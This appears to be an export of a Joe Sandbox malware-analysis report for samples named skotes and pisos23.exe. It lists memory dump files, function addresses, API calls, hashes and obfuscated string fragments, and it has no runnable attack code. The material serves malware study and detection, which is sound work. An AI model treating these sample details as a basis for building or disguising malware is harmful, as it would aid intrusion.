Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d7d68f76a8ad22dc0384cf61108f51d110fb43f3b911998a4a38653d8f7918a6
Instruction ID: a4a6f76d83859819906fa8aef1fa0bd4b517a3d1e9b27468c6bb5bd5e7b355a3
Opcode Fuzzy Hash: d7d68f76a8ad22dc0384cf61108f51d110fb43f3b911998a4a38653d8f7918a6
Instruction Fuzzy Hash: 91F02732645524A6EB313A72AC01B5B37D9DF917B2B2983E1EC04E7191DE61EC0CC6E0

Non-executed Functions

Function 00B22EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00B22F5F
__Mtx_unlock.LIBCPMT ref: 00B22FCC
__Cnd_broadcast.LIBCPMT ref: 00B22FE3
__Mtx_unlock.LIBCPMT ref: 00B230F5
__Mtx_unlock.LIBCPMT ref: 00B2319B

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 1e9c0538a40f9524158fe998f76355e3b515495a53f43311aa92fe0046296551
Instruction ID: 4707a41b1139a36722ef6fd2bf6e06cdd5d464c32c5a3894ebcb288d7a0206fb
Opcode Fuzzy Hash: 1e9c0538a40f9524158fe998f76355e3b515495a53f43311aa92fe0046296551
Instruction Fuzzy Hash: E4A103B0A00225AFDB10DFA4D945B5BBBF8FF15710F1441A9E819E7241EB39EA14CBE1

Function 00B5CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B5CC66

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 051be88c314246b39a03a0804e465bda222bde4938d997b6e871e03877dafd82
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 82B104329043859FDB158F28C8817AEBFF6EF55341F1441EADC55EB281D6349D4ACB90

Function 00B3BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00B3BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00B3BBE4
_xtime_get.LIBCPMT ref: 00B3BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00B3BC13

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 474ce5cf2d3abd81c5c2a85ef4179d66ae5e81fffda877eb5a3ce6fa9525a84e
Instruction ID: b8eaf973e389c6ea05cfc3bb2049241c88ba815987ca7a4790556c935f2195b9
Opcode Fuzzy Hash: 474ce5cf2d3abd81c5c2a85ef4179d66ae5e81fffda877eb5a3ce6fa9525a84e
Instruction Fuzzy Hash: 10211071900119AFDF00EBA4D8829BEBBB9EF48710F600055F605B7251DB30AD459B90

Analysis Process: pisos23.exePID: 7796, Parent PID: 7576COMMON

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	580
Total number of Limit Nodes:	10

Executed Functions

Function 00A6DD40 Relevance: 29.6, APIs: 1, Strings: 15, Instructions: 1613COMMON

Download Yara Rule

Strings

=zcT, xrefs: 00A6DE6E
@5q, xrefs: 00A6DF09
=zcT, xrefs: 00A6E582
hJiw, xrefs: 00A6E6E3
YR0, xrefs: 00A6DE0C
j2Td, xrefs: 00A6E921
YR0, xrefs: 00A6E4B2
J/(6, xrefs: 00A6F222
j2Td, xrefs: 00A6E000
@5q, xrefs: 00A6E729
J/(6, xrefs: 00A6E31F
=zcT, xrefs: 00A6E578
J/(6, xrefs: 00A6F218
hJiw, xrefs: 00A6E07A
gJiw, xrefs: 00A6DD98

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID: YR0$YR0$=zcT$=zcT$=zcT$@5q$@5q$J/(6$J/(6$J/(6$gJiw$hJiw$hJiw$j2Td$j2Td
API String ID: 0-792505653
Opcode ID: 8191c3fb81fb3ed7218ba02b996325cc9cf448a3135bc4db199a5b7286c93729
Instruction ID: 2d74e02fec18ce8a0bf8ed6cb5f8c587bcdc9d8e7a9e3d4828df7ed2deda6b72
Opcode Fuzzy Hash: 8191c3fb81fb3ed7218ba02b996325cc9cf448a3135bc4db199a5b7286c93729
Instruction Fuzzy Hash: BDB28A7B7016018BCB1CCA389CD96BE77F7ABD1391B39891AE455C72A0DE35CC458B02

Function 00A6D3E0 Relevance: 11.1, APIs: 2, Strings: 4, Instructions: 601COMMON

Download Yara Rule

Strings

n, xrefs: 00A6DB46
2, xrefs: 00A6D5F7
n, xrefs: 00A6D511
2, xrefs: 00A6DB5F

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID:
String ID: 2$ 2$ n$ n
API String ID: 0-2808837186
Opcode ID: 6c442bee540de7586f484f88d8117f1b68a71cd95899ff29baaf098bd9a08d6b
Instruction ID: 4b72be15ce17e3b779f17a2178fd38278a2a0cf3ce4030266b503622b339d4c9
Opcode Fuzzy Hash: 6c442bee540de7586f484f88d8117f1b68a71cd95899ff29baaf098bd9a08d6b
Instruction Fuzzy Hash: A112577AF041158B8F289B6D88D93FD77F19F54394F39882AE825DB350DA34EC868742

Function 00B23677 Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B23A7C: CreateFileW.KERNELBASE(00000000,00000000,?,00B23720,?,?,00000000,?,00B23720,00000000,0000000C), ref: 00B23A99

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2378B
__dosmaperr.LIBCMT ref: 00B23792
GetFileType.KERNELBASE(00000000), ref: 00B2379E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B237A8
__dosmaperr.LIBCMT ref: 00B237B1
CloseHandle.KERNEL32(00000000), ref: 00B237D1
CloseHandle.KERNEL32(00B1E31E), ref: 00B2391E
GetLastError.KERNEL32 ref: 00B23950
__dosmaperr.LIBCMT ref: 00B23957

Memory Dump Source

Source File: 00000007.00000002.2927868889.0000000000A61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000007.00000002.2927845416.0000000000A60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927938596.0000000000B27000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927961242.0000000000B31000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B32000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2927981704.0000000000B35000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928025040.0000000000B39000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2928045375.0000000000B3F000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a60000_pisos23.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 59ac6bc080abdffb094d9bb71ce82dd9b63a75f59982938bbc168cf6406ca64a
Instruction ID: 72f6df69ba3d343682df61e1014b2522a20e993d56cfe6a7aaa75747be23e178
Opcode Fuzzy Hash: 59ac6bc080abdffb094d9bb71ce82dd9b63a75f59982938bbc168cf6406ca64a
Instruction Fuzzy Hash: 9DA13732A141649FCF199F68EC95BAE3BE1EB06720F140199F8159F3A1CB399E42CB51

Function 00B1E8FD Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

